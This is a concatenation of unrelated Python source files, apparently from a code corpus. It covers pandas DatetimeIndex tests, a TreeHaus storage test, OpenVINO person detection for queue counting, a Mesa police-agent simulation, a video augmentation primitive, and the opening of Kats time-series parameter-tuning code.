self._print("거래 기록이 없습니다")
return
for result in results:
self._print(f"@{result['date_time']}, {result['type']}")
self._print(f"{result['price']} x {result['amount']}")
def _print(self, contents, logger_skip=False):
if logger_skip is not True:
self.logger.info(contents)
print(contents)
|
py
|
1a5f0e8b1f6fe5aa65889531125286d7a2293838
|
# Copyright 2017,2021 Niall McCarroll
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import random
import os
import os.path
from time import sleep
from os.path import exists
import gc
import copy
from tests.test_utils import TestUtils
from treehaus import TreeHaus
class TestWorkload(unittest.TestCase):
def test_workload(self):
self.store = TestUtils.open()
self.index = self.store.getIndex("index1")
self.test = {} # mirror the index contents in a dict
num_versions = 20
num_traverses = 0
checkpoints = []
random.seed(21)
for v in range(0,num_versions):
TestUtils.alter(self.index,self.test,200,1,0.2)
checkpoint_number = self.store.commit()
if checkpoint_number:
checkpoints.append((checkpoint_number,copy.deepcopy(self.test)))
TestUtils.check(self.index,self.test)
TestUtils.traverse_check(self.index,self.test,None,None,False)
TestUtils.traverse_check(self.index,self.test,None,None,True)
for i in range(0,num_traverses):
(lwb,upb) = test_utils.make_key_pair(5)
TestUtils.traverse_check(self.index,self.test,lwb,upb,True)
TestUtils.traverse_check(self.index,self.test,lwb,None,True)
TestUtils.traverse_check(self.index,self.test,lwb,upb,False)
TestUtils.traverse_check(self.index,self.test,None,upb,True)
TestUtils.traverse_check(self.index,self.test,None,upb,False)
for (checkpoint_number, test_dict) in checkpoints:
with TreeHaus.open(TestUtils.PATH,openAtUpdate=checkpoint_number) as cp:
cp_index = cp.getIndex("index1")
TestUtils.check(cp_index,test_dict)
if __name__ == '__main__':
unittest.main()
|
py
|
1a5f0f2267c30b6c9dea1da214d37bb9bc147818
|
import random
random_numbers = [random.randint(0,49) for x in range (20)]
print(random_numbers)
squared_numbers = [item ** 2 for item in random_numbers]
print (squared_numbers)
|
py
|
1a5f1036b753eb7396b344bc2463a804ef19df89
|
def gen(camera):
"""Video streaming generator function."""
while True:
frame = camera.get_frame()
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n')
|
py
|
1a5f10a4c27060e2239c24b3d9feeeffdbe98a6d
|
'''
Copyright 2021 D3M Team
Copyright (c) 2021 DATA Lab at Texas A&M University
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
from d3m import container
from d3m.metadata import hyperparams
import imgaug.augmenters as iaa
import typing
from autovideo.utils import construct_primitive_metadata
from autovideo.base.augmentation_base import AugmentationPrimitiveBase
__all__ = ('ShearYPrimitive',)
Inputs = container.DataFrame
class Hyperparams(hyperparams.Hyperparams):
shear = hyperparams.Hyperparameter[typing.Union[float,tuple,list]](
default=(-20, 20),
description="Shear in degrees (NOT radians), i.e. expected value range is around [-360, 360], with reasonable values being in the range of [-45, 45].",
semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter'],
)
seed = hyperparams.Constant[int](
default=0,
description='Minimum workers to extract frames simultaneously',
semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter'],
)
order = hyperparams.Hyperparameter[typing.Union[int,list]](
default=1,
description="interpolation order to use",
semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter'],
)
cval = hyperparams.Hyperparameter[typing.Union[float,tuple,list]](
default=(0,255),
description=" The constant value to use when filling in newly created pixels.",
semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter'],
)
mode = hyperparams.Hyperparameter[typing.Union[str,list]](
default='constant',
description="Method to use when filling in newly created pixels",
semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter'],
)
class ShearYPrimitive(AugmentationPrimitiveBase[Inputs, Hyperparams]):
"""
A primitive which Apply affine shear on the y-axis to input data.
"""
metadata = construct_primitive_metadata("augmentation", "geometric_ShearY")
def _get_function(self):
"""
set up function and parameter of functions
"""
shear = self.hyperparams["shear"]
seed = self.hyperparams["seed"]
order = self.hyperparams["order"]
cval = self.hyperparams["cval"]
mode = self.hyperparams["mode"]
return iaa.ShearY(shear=shear, seed=seed, order=order, cval=cval, mode=mode)
|
py
|
1a5f11a802f1eb811166e45cfca0cc67ac4cdce4
|
from nonebot.log import logger
from tortoise import Tortoise
async def database_init():
'''
初始化建表
'''
logger.debug('正在注册数据库')
database_path = "./data/data.db"
db_url = f'sqlite://{database_path}'
# 这里填要加载的表
models = [
'src.modules.bot_info',
'src.modules.group_info',
'src.modules.plugin_info',
'src.modules.user_info',
'src.modules.token_info',
'src.modules.search_record'
]
modules = {"models": models}
await Tortoise.init(db_url=db_url, modules=modules)
await Tortoise.generate_schemas()
logger.debug('数据库注册完成')
|
py
|
1a5f120efd2b5de636940dd292c8f3e106695e51
|
import random
from mesa import Agent
class Cop(Agent):
def __init__(self, unique_id, model, pos, vision):
super().__init__(unique_id, model)
self.breed = "cop"
self.pos = pos
self.vision = vision
self.can_arrest = True
self.arrested_step = 0
self.wait_for = 0 # no of steps to wait before arresting someone else
def step(self):
"""
Inspect local vision and arrest a random active agent. Move if
applicable.
"""
# check whether they can arrest again
if not self.can_arrest and self.wait_for == 0:
self.can_arrest = True
else:
self.wait_for -= 1
self.update_neighbors()
active_neighbors, deviant_neighbors, cop_neighbors = [], [], []
for agent in self.neighbors:
if (
agent.breed == "citizen"
and agent.condition == "Active"
and not agent.jail_sentence
):
active_neighbors.append(agent)
if agent.breed == "cop":
cop_neighbors.append(agent)
if (
agent.breed == "citizen"
and agent.condition == "Deviant"
and not agent.jail_sentence
):
deviant_neighbors.append(agent)
if (
self.can_arrest
and self.model.jail_capacity > len(self.model.jailed_agents)
and len(cop_neighbors) > 1
):
arrestee = None
if deviant_neighbors:
possibles = []
for agent in deviant_neighbors:
if agent.steps_active >= 3:
possibles.append(agent)
arrestee = self.random.choice(possibles) if possibles else None
elif active_neighbors:
possibles = []
for agent in active_neighbors:
if agent.steps_active >= 3:
possibles.append(agent)
arrestee = self.random.choice(possibles) if possibles else None
if arrestee:
arrestee.jail_sentence = True
self.model.arrested_agents.append(arrestee)
self.can_arrest = False
self.wait_for = 15
if self.model.movement and self.empty_neighbors and self.can_arrest:
useful_move = self.move_towards_actives()
if useful_move:
self.model.grid.move_agent(self, useful_move)
else:
self.model.grid.move_agent(
self, self.random.choice(self.empty_neighbors)
)
def move_towards_actives(self):
neighborhood = self.model.grid.get_neighborhood(
self.pos, moore=False, radius=self.vision
)
deviants, actives = [], []
for x in neighborhood:
neighbor = self.model.grid.get_cell_list_contents(x)
if neighbor and neighbor[0].breed == "citizen":
if neighbor[0].condition == "Deviant":
deviants.append(x)
if neighbor[0].condition == "Active":
actives.append(x)
if deviants:
toward = random.choice(deviants)
elif actives:
toward = random.choice(actives)
else:
return None
dict = {
"left": (self.pos[0] - 1, self.pos[1]),
"right": (self.pos[0] + 1, self.pos[1]),
"up": (self.pos[0], self.pos[1] - 1),
"down": (self.pos[0], self.pos[1] + 1),
}
new_pos = []
if toward:
if toward[0] > self.pos[0] and self.model.grid.is_cell_empty(
dict["right"]
): # citizen is more right than cop
new_pos.append("right")
elif toward[0] < self.pos[0] and self.model.grid.is_cell_empty(
dict["left"]
): # citizen is more left than cop
new_pos.append("left")
if toward[1] > self.pos[1] and self.model.grid.is_cell_empty(
dict["down"]
): # citizen is further down than cop
new_pos.append("down")
elif toward[1] < self.pos[1] and self.model.grid.is_cell_empty(
dict["up"]
): # citizen is further up than cop
new_pos.append("up")
new_pos = dict[random.choice(new_pos)] if new_pos else None
return new_pos
def update_neighbors(self):
"""
Look around and see who my neighbors are.
"""
self.neighborhood = self.model.grid.get_neighborhood(
self.pos, moore=False, radius=1
)
self.neighbors = self.model.grid.get_cell_list_contents(self.neighborhood)
self.empty_neighbors = [
c for c in self.neighborhood if self.model.grid.is_cell_empty(c)
]
|
py
|
1a5f12103595c7dc272babe2f426ef463ee03e21
|
import warnings
import pytest
import numpy as np
from datetime import date
import dateutil
import pandas as pd
import pandas.util.testing as tm
from pandas.compat import lrange
from pandas import (DatetimeIndex, Index, date_range, DataFrame,
Timestamp, offsets)
from pandas.util.testing import assert_almost_equal
randn = np.random.randn
class TestDatetimeIndex(object):
def test_roundtrip_pickle_with_tz(self):
# GH 8367
# round-trip of timezone
index = date_range('20130101', periods=3, tz='US/Eastern', name='foo')
unpickled = tm.round_trip_pickle(index)
tm.assert_index_equal(index, unpickled)
def test_reindex_preserves_tz_if_target_is_empty_list_or_array(self):
# GH7774
index = date_range('20130101', periods=3, tz='US/Eastern')
assert str(index.reindex([])[0].tz) == 'US/Eastern'
assert str(index.reindex(np.array([]))[0].tz) == 'US/Eastern'
def test_time_loc(self): # GH8667
from datetime import time
from pandas._libs.index import _SIZE_CUTOFF
ns = _SIZE_CUTOFF + np.array([-100, 100], dtype=np.int64)
key = time(15, 11, 30)
start = key.hour * 3600 + key.minute * 60 + key.second
step = 24 * 3600
for n in ns:
idx = pd.date_range('2014-11-26', periods=n, freq='S')
ts = pd.Series(np.random.randn(n), index=idx)
i = np.arange(start, n, step)
tm.assert_numpy_array_equal(ts.index.get_loc(key), i,
check_dtype=False)
tm.assert_series_equal(ts[key], ts.iloc[i])
left, right = ts.copy(), ts.copy()
left[key] *= -10
right.iloc[i] *= -10
tm.assert_series_equal(left, right)
def test_time_overflow_for_32bit_machines(self):
# GH8943. On some machines NumPy defaults to np.int32 (for example,
# 32-bit Linux machines). In the function _generate_regular_range
# found in tseries/index.py, `periods` gets multiplied by `strides`
# (which has value 1e9) and since the max value for np.int32 is ~2e9,
# and since those machines won't promote np.int32 to np.int64, we get
# overflow.
periods = np.int_(1000)
idx1 = pd.date_range(start='2000', periods=periods, freq='S')
assert len(idx1) == periods
idx2 = pd.date_range(end='2000', periods=periods, freq='S')
assert len(idx2) == periods
def test_nat(self):
assert DatetimeIndex([np.nan])[0] is pd.NaT
def test_week_of_month_frequency(self):
# GH 5348: "ValueError: Could not evaluate WOM-1SUN" shouldn't raise
d1 = date(2002, 9, 1)
d2 = date(2013, 10, 27)
d3 = date(2012, 9, 30)
idx1 = DatetimeIndex([d1, d2])
idx2 = DatetimeIndex([d3])
result_append = idx1.append(idx2)
expected = DatetimeIndex([d1, d2, d3])
tm.assert_index_equal(result_append, expected)
result_union = idx1.union(idx2)
expected = DatetimeIndex([d1, d3, d2])
tm.assert_index_equal(result_union, expected)
# GH 5115
result = date_range("2013-1-1", periods=4, freq='WOM-1SAT')
dates = ['2013-01-05', '2013-02-02', '2013-03-02', '2013-04-06']
expected = DatetimeIndex(dates, freq='WOM-1SAT')
tm.assert_index_equal(result, expected)
def test_hash_error(self):
index = date_range('20010101', periods=10)
with tm.assert_raises_regex(TypeError, "unhashable type: %r" %
type(index).__name__):
hash(index)
def test_stringified_slice_with_tz(self):
# GH2658
import datetime
start = datetime.datetime.now()
idx = DatetimeIndex(start=start, freq="1d", periods=10)
df = DataFrame(lrange(10), index=idx)
df["2013-01-14 23:44:34.437768-05:00":] # no exception here
def test_append_join_nondatetimeindex(self):
rng = date_range('1/1/2000', periods=10)
idx = Index(['a', 'b', 'c', 'd'])
result = rng.append(idx)
assert isinstance(result[0], Timestamp)
# it works
rng.join(idx, how='outer')
def test_map(self):
rng = date_range('1/1/2000', periods=10)
f = lambda x: x.strftime('%Y%m%d')
result = rng.map(f)
exp = Index([f(x) for x in rng], dtype='<U8')
tm.assert_index_equal(result, exp)
def test_iteration_preserves_tz(self):
# see gh-8890
index = date_range("2012-01-01", periods=3, freq='H', tz='US/Eastern')
for i, ts in enumerate(index):
result = ts
expected = index[i]
assert result == expected
index = date_range("2012-01-01", periods=3, freq='H',
tz=dateutil.tz.tzoffset(None, -28800))
for i, ts in enumerate(index):
result = ts
expected = index[i]
assert result._repr_base == expected._repr_base
assert result == expected
# 9100
index = pd.DatetimeIndex(['2014-12-01 03:32:39.987000-08:00',
'2014-12-01 04:12:34.987000-08:00'])
for i, ts in enumerate(index):
result = ts
expected = index[i]
assert result._repr_base == expected._repr_base
assert result == expected
@pytest.mark.parametrize('periods', [0, 9999, 10000, 10001])
def test_iteration_over_chunksize(self, periods):
# GH21012
index = date_range('2000-01-01 00:00:00', periods=periods, freq='min')
num = 0
for stamp in index:
assert index[num] == stamp
num += 1
assert num == len(index)
def test_misc_coverage(self):
rng = date_range('1/1/2000', periods=5)
result = rng.groupby(rng.day)
assert isinstance(list(result.values())[0][0], Timestamp)
idx = DatetimeIndex(['2000-01-03', '2000-01-01', '2000-01-02'])
assert not idx.equals(list(idx))
non_datetime = Index(list('abc'))
assert not idx.equals(list(non_datetime))
def test_string_index_series_name_converted(self):
# #1644
df = DataFrame(np.random.randn(10, 4),
index=date_range('1/1/2000', periods=10))
result = df.loc['1/3/2000']
assert result.name == df.index[2]
result = df.T['1/3/2000']
assert result.name == df.index[2]
def test_get_duplicates(self):
idx = DatetimeIndex(['2000-01-01', '2000-01-02', '2000-01-02',
'2000-01-03', '2000-01-03', '2000-01-04'])
with warnings.catch_warnings(record=True):
# Deprecated - see GH20239
result = idx.get_duplicates()
ex = DatetimeIndex(['2000-01-02', '2000-01-03'])
tm.assert_index_equal(result, ex)
def test_argmin_argmax(self):
idx = DatetimeIndex(['2000-01-04', '2000-01-01', '2000-01-02'])
assert idx.argmin() == 1
assert idx.argmax() == 0
def test_sort_values(self):
idx = DatetimeIndex(['2000-01-04', '2000-01-01', '2000-01-02'])
ordered = idx.sort_values()
assert ordered.is_monotonic
ordered = idx.sort_values(ascending=False)
assert ordered[::-1].is_monotonic
ordered, dexer = idx.sort_values(return_indexer=True)
assert ordered.is_monotonic
tm.assert_numpy_array_equal(dexer, np.array([1, 2, 0], dtype=np.intp))
ordered, dexer = idx.sort_values(return_indexer=True, ascending=False)
assert ordered[::-1].is_monotonic
tm.assert_numpy_array_equal(dexer, np.array([0, 2, 1], dtype=np.intp))
def test_map_bug_1677(self):
index = DatetimeIndex(['2012-04-25 09:30:00.393000'])
f = index.asof
result = index.map(f)
expected = Index([f(index[0])])
tm.assert_index_equal(result, expected)
def test_groupby_function_tuple_1677(self):
df = DataFrame(np.random.rand(100),
index=date_range("1/1/2000", periods=100))
monthly_group = df.groupby(lambda x: (x.year, x.month))
result = monthly_group.mean()
assert isinstance(result.index[0], tuple)
def test_append_numpy_bug_1681(self):
# another datetime64 bug
dr = date_range('2011/1/1', '2012/1/1', freq='W-FRI')
a = DataFrame()
c = DataFrame({'A': 'foo', 'B': dr}, index=dr)
result = a.append(c)
assert (result['B'] == dr).all()
def test_isin(self):
index = tm.makeDateIndex(4)
result = index.isin(index)
assert result.all()
result = index.isin(list(index))
assert result.all()
assert_almost_equal(index.isin([index[2], 5]),
np.array([False, False, True, False]))
def test_does_not_convert_mixed_integer(self):
df = tm.makeCustomDataframe(10, 10,
data_gen_f=lambda *args, **kwargs: randn(),
r_idx_type='i', c_idx_type='dt')
cols = df.columns.join(df.index, how='outer')
joined = cols.join(df.columns)
assert cols.dtype == np.dtype('O')
assert cols.dtype == joined.dtype
tm.assert_numpy_array_equal(cols.values, joined.values)
def test_join_self(self, join_type):
index = date_range('1/1/2000', periods=10)
joined = index.join(index, how=join_type)
assert index is joined
def assert_index_parameters(self, index):
assert index.freq == '40960N'
assert index.inferred_freq == '40960N'
def test_ns_index(self):
nsamples = 400
ns = int(1e9 / 24414)
dtstart = np.datetime64('2012-09-20T00:00:00')
dt = dtstart + np.arange(nsamples) * np.timedelta64(ns, 'ns')
freq = ns * offsets.Nano()
index = pd.DatetimeIndex(dt, freq=freq, name='time')
self.assert_index_parameters(index)
new_index = pd.DatetimeIndex(start=index[0], end=index[-1],
freq=index.freq)
self.assert_index_parameters(new_index)
def test_join_with_period_index(self, join_type):
df = tm.makeCustomDataframe(
10, 10, data_gen_f=lambda *args: np.random.randint(2),
c_idx_type='p', r_idx_type='dt')
s = df.iloc[:5, 0]
with tm.assert_raises_regex(ValueError,
'can only call with other '
'PeriodIndex-ed objects'):
df.columns.join(s.index, how=join_type)
def test_factorize(self):
idx1 = DatetimeIndex(['2014-01', '2014-01', '2014-02', '2014-02',
'2014-03', '2014-03'])
exp_arr = np.array([0, 0, 1, 1, 2, 2], dtype=np.intp)
exp_idx = DatetimeIndex(['2014-01', '2014-02', '2014-03'])
arr, idx = idx1.factorize()
tm.assert_numpy_array_equal(arr, exp_arr)
tm.assert_index_equal(idx, exp_idx)
arr, idx = idx1.factorize(sort=True)
tm.assert_numpy_array_equal(arr, exp_arr)
tm.assert_index_equal(idx, exp_idx)
# tz must be preserved
idx1 = idx1.tz_localize('Asia/Tokyo')
exp_idx = exp_idx.tz_localize('Asia/Tokyo')
arr, idx = idx1.factorize()
tm.assert_numpy_array_equal(arr, exp_arr)
tm.assert_index_equal(idx, exp_idx)
idx2 = pd.DatetimeIndex(['2014-03', '2014-03', '2014-02', '2014-01',
'2014-03', '2014-01'])
exp_arr = np.array([2, 2, 1, 0, 2, 0], dtype=np.intp)
exp_idx = DatetimeIndex(['2014-01', '2014-02', '2014-03'])
arr, idx = idx2.factorize(sort=True)
tm.assert_numpy_array_equal(arr, exp_arr)
tm.assert_index_equal(idx, exp_idx)
exp_arr = np.array([0, 0, 1, 2, 0, 2], dtype=np.intp)
exp_idx = DatetimeIndex(['2014-03', '2014-02', '2014-01'])
arr, idx = idx2.factorize()
tm.assert_numpy_array_equal(arr, exp_arr)
tm.assert_index_equal(idx, exp_idx)
# freq must be preserved
idx3 = date_range('2000-01', periods=4, freq='M', tz='Asia/Tokyo')
exp_arr = np.array([0, 1, 2, 3], dtype=np.intp)
arr, idx = idx3.factorize()
tm.assert_numpy_array_equal(arr, exp_arr)
tm.assert_index_equal(idx, idx3)
def test_factorize_tz(self, tz_naive_fixture):
tz = tz_naive_fixture
# GH#13750
base = pd.date_range('2016-11-05', freq='H', periods=100, tz=tz)
idx = base.repeat(5)
exp_arr = np.arange(100, dtype=np.intp).repeat(5)
for obj in [idx, pd.Series(idx)]:
arr, res = obj.factorize()
tm.assert_numpy_array_equal(arr, exp_arr)
tm.assert_index_equal(res, base)
def test_factorize_dst(self):
# GH 13750
idx = pd.date_range('2016-11-06', freq='H', periods=12,
tz='US/Eastern')
for obj in [idx, pd.Series(idx)]:
arr, res = obj.factorize()
tm.assert_numpy_array_equal(arr, np.arange(12, dtype=np.intp))
tm.assert_index_equal(res, idx)
idx = pd.date_range('2016-06-13', freq='H', periods=12,
tz='US/Eastern')
for obj in [idx, pd.Series(idx)]:
arr, res = obj.factorize()
tm.assert_numpy_array_equal(arr, np.arange(12, dtype=np.intp))
tm.assert_index_equal(res, idx)
@pytest.mark.parametrize('arr, expected', [
(pd.DatetimeIndex(['2017', '2017']), pd.DatetimeIndex(['2017'])),
(pd.DatetimeIndex(['2017', '2017'], tz='US/Eastern'),
pd.DatetimeIndex(['2017'], tz='US/Eastern')),
])
def test_unique(self, arr, expected):
result = arr.unique()
tm.assert_index_equal(result, expected)
|
py
|
1a5f12259d2460a7e655adc74d767538fe95d3f6
|
import numpy as np
import time
from openvino.inference_engine import IENetwork, IECore
import os
import cv2
import argparse
import sys
class Queue:
'''
Class for dealing with queues
'''
def __init__(self):
self.queues=[]
def add_queue(self, points):
self.queues.append(points)
def get_queues(self, image):
for q in self.queues:
x_min, y_min, x_max, y_max=q
frame=image[y_min:y_max, x_min:x_max]
yield frame
def check_coords(self, coords, frame):
d={k+1:0 for k in range(len(self.queues))}
for coord in coords:
for i, q in enumerate(self.queues):
if coord[0]>q[0] and coord[2]<q[2]:
d[i+1]+=1
#cv2.rectangle(frame, (coord[0], coord[1]), (coord[2], coord[3]), (0, 55, 255), 4)
return d, frame
class PersonDetect:
'''
Class for the Person Detection Model.
'''
def __init__(self, model_name, device, threshold=0.60):
self.model_weights=model_name+'.bin'
self.model_structure=model_name+'.xml'
self.device=device
self.threshold=threshold
self.initial_w = ''
self.initial_h = ''
try:
self.model=IENetwork(self.model_structure, self.model_weights)
except Exception as e:
raise ValueError("Could not Initialise the network. Have you enterred the correct model path?")
self.input_name=next(iter(self.model.inputs))
self.input_shape=self.model.inputs[self.input_name].shape
self.output_name=next(iter(self.model.outputs))
self.output_shape=self.model.outputs[self.output_name].shape
def load_model(self):
self.core = IECore()
self.net = self.core.load_network(network=self.model, device_name=self.device, num_requests=1)
def predict(self, image):
input_img = self.preprocess_input(image)
input_dict = {self.input_name:input_img}
self.net.start_async(request_id=0,inputs=input_dict)
status = self.net.requests[0].wait(-1)
if status == 0:
results = self.net.requests[0].outputs[self.output_name]
image,coords = self.draw_outputs(results, image)
return coords,image
def draw_outputs(self, results, frame):
lst=[]
for obj in results[0][0]:
# Draw bounding box for object when it's probability is more than the specified threshold
if obj[2] > self.threshold:
xmin = int(obj[3] * self.initial_w)
ymin = int(obj[4] * self.initial_h)
xmax = int(obj[5] * self.initial_w)
ymax = int(obj[6] * self.initial_h)
cv2.rectangle(frame, (xmin, ymin), (xmax, ymax), (0, 55, 255), 4)
c = [xmin,ymin,xmax,ymax]
lst.append(c)
return frame,lst
def preprocess_input(self, image):
n, c, h, w = self.input_shape
image = cv2.resize(image, (w, h))
image = image.transpose((2, 0, 1))
image = image.reshape((n, c, h, w))
return image
def main(args):
model=args.model
device=args.device
video_file=args.video
max_people=args.max_people
threshold=args.threshold
output_path=args.output_path
start_model_load_time=time.time()
pd= PersonDetect(model, device, threshold)
pd.load_model()
total_model_load_time = time.time() - start_model_load_time
queue=Queue()
try:
queue_param=np.load(args.queue_param)
for q in queue_param:
queue.add_queue(q)
except:
print("error loading queue param file")
try:
cap=cv2.VideoCapture(video_file)
except FileNotFoundError:
print("Cannot locate video file: "+ video_file)
except Exception as e:
print("Something else went wrong with the video file: ", e)
pd.initial_w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
pd.initial_h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
video_len = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
fps = int(cap.get(cv2.CAP_PROP_FPS))
out_video = cv2.VideoWriter(os.path.join(output_path, 'output_video.mp4'), cv2.VideoWriter_fourcc(*'avc1'), fps, (pd.initial_w, pd.initial_h), True)
counter=0
start_inference_time=time.time()
try:
while cap.isOpened():
ret, frame=cap.read()
if not ret:
break
counter+=1
coords, image= pd.predict(frame)
num_people, image= queue.check_coords(coords,image)
print(f"Total People in frame = {len(coords)}")
print(f"Number of people in queue = {num_people}")
out_text=""
y_pixel=45
#cv2.putText(image, f"Total People in frame = {len(coords)}", (15, y_pixel), cv2.FONT_HERSHEY_COMPLEX, 2, (0, 255, 0), 2)
for k, v in num_people.items():
out_text += f"No. of People in Queue {k} is {v} "
if v >= int(max_people):
out_text += f" Queue full; Please move to next Queue "
cv2.putText(image, out_text, (15, y_pixel), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 255, 0), 2)
out_text=""
y_pixel+=40
out_video.write(image)
total_time=time.time()-start_inference_time
total_inference_time=round(total_time, 1)
fps=counter/total_inference_time
with open(os.path.join(output_path, 'stats.txt'), 'w') as f:
f.write(str(total_inference_time)+'\n')
f.write(str(fps)+'\n')
f.write(str(total_model_load_time)+'\n')
cap.release()
cv2.destroyAllWindows()
except Exception as e:
print("Could not run Inference: ", e)
if __name__=='__main__':
parser=argparse.ArgumentParser()
parser.add_argument('--model', required=True)
parser.add_argument('--device', default='CPU')
parser.add_argument('--video', default=None)
parser.add_argument('--queue_param', default=None)
parser.add_argument('--output_path', default='/results')
parser.add_argument('--max_people', default=2)
parser.add_argument('--threshold', default=0.60)
args=parser.parse_args()
main(args)
|
py
|
1a5f12a6e5b1387342b5fad810d1a8c9581498e1
|
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
""" Module that has parameter tuning classes for time series models.
This module has a collection of classes. A subset of these classes are parameter tuning
strategies with their abstract parent class. In addition, there are helper classes,
such as a factory that creates search strategy objects.
Typical usage example:
>>> import time_series_parameter_tuning as tspt
>>> a_search_strategy = tspt.SearchMethodFactory.create_search_method(...)
"""
import logging
import math
import time
import uuid
from abc import ABC, abstractmethod
from functools import reduce
from multiprocessing.pool import Pool
from numbers import Number
from typing import Any, Callable, Dict, List, Optional, Union
import pandas as pd
from ax import Arm, ComparisonOp, Data, OptimizationConfig, SearchSpace
from ax.core.experiment import Experiment
from ax.core.generator_run import GeneratorRun
from ax.core.metric import Metric
from ax.core.objective import Objective
from ax.core.outcome_constraint import OutcomeConstraint
from ax.modelbridge.discrete import DiscreteModelBridge
from ax.modelbridge.registry import Models
from ax.runners.synthetic import SyntheticRunner
from kats.consts import SearchMethodEnum
from ax.service.utils.instantiation import InstantiationBase
# Maximum number of worker processes used to evaluate trial arms in parallel
MAX_NUM_PROCESSES = 50
def compute_search_cardinality(params_space: List[Dict[str, Any]]) -> float:
"""compute cardinality of search space params"""
# check if search space is infinite
is_infinite = any([param["type"] == "range" for param in params_space])
if is_infinite:
return math.inf
else:
return math.prod([len(param["values"]) for param in params_space])
class Final(type):
"""A helper class to ensure a class cannot be inherited.
It is used as:
class Foo(metaclass=Final):
...
Once the class, Foo, is declared in this way, no other class can
inherit it. See the declaration of SearchMethodFactory class below.
Attributes:
N/A
"""
# pyre-fixme[3]: Return type must be annotated.
# pyre-fixme[2]: Parameter must be annotated.
def __new__(metacls, name, bases, classdict):
"""Checks if child class is instantiated. Throws an error if so.
Args:
metacls: To be used by metaclass argument of a new class instantiation
name: Same as above
bases: Same as above
classdict: Same as above
Returns:
Type of the new class
Raises:
TypeError:
Raised when an object of a class using this Final
class as metaclass is created.
"""
for b in bases:
if isinstance(b, Final):
raise TypeError(
"type '{0}' is not an acceptable base type".format(b.__name__)
)
return type.__new__(metacls, name, bases, dict(classdict))
class TimeSeriesEvaluationMetric(Metric):
"""Object to evaluate an arm
An object of this class is used to evaluate an arm through search. It is mainly
used to parallelize the search, as evaluation of an arm needs to be run in
parallel. Obviously, this is possible if the search strategy allows it in
theory.
Attributes:
evaluation_function: The name of the function to be used in evaluation.
logger: the logger object to log.
multiprocessing: Flag to decide whether evaluation will run in parallel.
"""
def __init__(
self,
name: str,
# pyre-fixme[24]: Generic type `Callable` expects 2 type parameters.
evaluation_function: Callable,
logger: logging.Logger,
multiprocessing: bool = False,
) -> None:
super().__init__(name)
self.evaluation_function = evaluation_function
self.logger = logger
self.multiprocessing = multiprocessing
@classmethod
def is_available_while_running(cls) -> bool:
"""Metrics are available while the trial is `RUNNING` and should
always be re-fetched.
"""
return True
# pyre-fixme[2]: Parameter must be annotated.
# pyre-fixme[24]: Generic type `dict` expects 2 type parameters, use
# `typing.Dict` to avoid runtime subscripting errors.
def evaluate_arm(self, arm) -> Dict:
"""Evaluates the performance of an arm.
Takes an arm object, gets its parameter values, runs
evaluation_function and returns what that function returns
after reformatting it.
Args:
arm: The arm object to be evaluated.
Returns:
Either a dict or a list of dict. These dict objects need
to have metric name that describes the metric, arm_name,
mean which is the mean of the evaluation value and its
standard error.
"""
# Arm evaluation requires mean and standard error or dict for multiple metrics
evaluation_result = self.evaluation_function(arm.parameters)
if isinstance(evaluation_result, dict):
return [
{
"metric_name": name,
"arm_name": arm.name,
"mean": value[0],
"sem": value[1],
}
for (name, value) in evaluation_result.items()
]
elif isinstance(evaluation_result, Number):
evaluation_result = (evaluation_result, 0.0)
elif (
isinstance(evaluation_result, tuple)
and len(evaluation_result) == 2
and all(isinstance(n, Number) for n in evaluation_result)
):
pass
else:
raise TypeError(
"Evaluation function should either return a single numeric "
"value that represents the error or a tuple of two numeric "
"values, one for the mean of error and the other for the "
"standard error of the mean of the error."
)
return {
"metric_name": self.name,
"arm_name": arm.name,
"mean": evaluation_result[0],
"sem": evaluation_result[1],
}
# pyre-fixme[14]: `fetch_trial_data` overrides method defined in `Metric`
# inconsistently.
# pyre-fixme[14]: `fetch_trial_data` overrides method defined in `Metric`
# inconsistently.
# pyre-fixme[2]: Parameter must be annotated.
def fetch_trial_data(self, trial) -> Data:
"""Calls evaluation of every arm in a trial.
Args:
trial: The trial of which all arms to be evaluated.
Returns:
Data object that has arm names, trial index, evaluation.
"""
if self.multiprocessing:
with Pool(processes=min(len(trial.arms), MAX_NUM_PROCESSES)) as pool:
records = pool.map(self.evaluate_arm, trial.arms)
pool.close()
else:
records = list(map(self.evaluate_arm, trial.arms))
if isinstance(records[0], list):
# Evaluation result output contains multiple metrics
records = [metric for record in records for metric in record]
for record in records:
record.update({"trial_index": trial.index})
return Data(df=pd.DataFrame.from_records(records))
class TimeSeriesParameterTuning(ABC):
"""Abstract class for search strategy class, such as GridSearch, RandomSearch.
Defines and imposes a structure to search strategy classes. Each search
strategy has to have attributes listed below. Also, it provides methods
that are common to search strategies.
Attributes:
parameters: List of dictionaries where each dict represents a hyperparameter.
experiment_name: An arbitrary name for the experiment object.
objective_name: An arbitrary name for the objective function that is used
in the evaluation function.
outcome_constraints: Constraints set on the outcome of the objective.
"""
# pyre-fixme[24]: Generic type `Callable` expects 2 type parameters.
evaluation_function: Optional[Callable] = None
outcome_constraints: Optional[List[OutcomeConstraint]] = None
def __init__(
self,
parameters: Optional[List[Dict[str, Any]]] = None,
experiment_name: Optional[str] = None,
